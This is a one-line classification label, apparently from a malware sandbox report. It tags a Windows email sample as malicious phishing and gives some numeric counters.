Classification label: mal52.phis.winEML@42/103@74/390